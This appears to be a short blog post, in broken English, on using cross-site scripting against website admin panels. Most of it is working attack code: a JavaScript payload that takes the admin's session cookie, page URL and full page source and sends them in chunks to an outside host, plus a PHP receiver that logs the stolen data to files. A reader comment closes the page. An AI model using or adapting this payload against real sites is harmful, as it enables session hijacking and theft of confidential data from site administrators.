XSS client-Attack
1. in the penetration test, can not find the admin panel?
2. without any other person login in, confidential information was stole?
3. extremely complex password, the non-management IP traces of login in?
This article discusses the XSS Client-Attack of the main issues in relation to the above three. To specify the following:
1, when the admin panel has XSS, XSS can be sent the administrator’s current page to the receiving end, using location.href to achieve
2, when the admin panel has XSS, though IE GET submit is limited, but the XSS can submit sub-page source code to the receiving end for several times, using ajax, document.documentElement.outerHTML to achieve
3, when the admin panel has XSS, XSS will sent the manage SESSION COOKIE to the receiving end, not strictly in the background verification, the attacker direct access to admin login panel, using document.cookie to achieve
Here focus to talk about 2, attacker can obtain html source code by document.documentElement.outerHTML,but he need to use AJAX? The cause of the problem is that not all the source code can be obtained by document.documentElement.outerHTML
Example 1:
admin-1.html
This is source code
1 2 3 | <script> alert(document.documentElement.outerHTML) </script> |
how about this?
We have found, alert of the window, there is no “how about this?”, Which means that, in the inserted under XSS code can not be botained, therefore, attacker need to use AJAX to get the full code.
In addition, there is a situation in which the other side to open the page is stored in the local, such as: C: \Users\Administrator\Desktop\data.htm, attacker will use document.documentElement.outerHTML to obtain the source code.
See the following source code
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 | function sd(doc){
send = document.createElement('script');
send.src=server+'get.php?'+doc;
send.type='javascript';
head.appendChild(send);
}
function ajax(u) {
var xmlHttp;
try {
xmlHttp = new XMLHttpRequest;
} catch (e) {
try {
xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {
}
}
}
xmlHttp.open("GET",u,false);
xmlHttp.send(null);
return escape(xmlHttp.responseText);
}
var doc='';
var server='http://www.vul.kr/';
var head=document.getElementsByTagName('head').item(0);
url=encodeURIComponent(location.href);
ck=encodeURIComponent(document.cookie);
sd("s=1&u="+url+"&c="+ck);
if(location.href.indexOf("file:")==-1)
doc=ajax(location.href);
else
doc=escape(document.documentElement.outerHTML);
doclen=doc.length;
buflen=2040;
for(i=0;i<doclen;i=i+buflen){
dstr=doc.substr(i,buflen);
sd("s=2&d="+dstr);
}
sd("s=3"); |
the receive end:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | <? $url=0;$data=0;$cookie=0;$addr=0; $url=$_GET['u']; if(strlen($_GET['c'])>2)$cookie=$_GET['c']; if(strlen($_GET['d'])>2)$data=$_GET['d']; if(strlen($_SERVER['REMOTE_ADDR'])>2)$addr=$_SERVER['REMOTE_ADDR']; $str="<center><textarea name='textarea' cols=150 rows=30>"; $str.="\r\n\r\nURL:".$url."\r\nCookie:".$cookie."\r\nAddress:".$addr."\r\nTime:".date("Y-m-d h:i:s", time())."\r\n\r\n\r\n"; if($_GET['s']==1)w($str); if($_GET['s']==2)w(htmlentities($data)); if($_GET['s']==3)w("</textarea></center>"); function w($d){ $a=$_SERVER['REMOTE_ADDR']; @fwrite(@fopen("dc/".$a.".htm","a+"),stripcslashes($d));} ?> |
I just want to say that your blog is full of interesting articles, keep us posting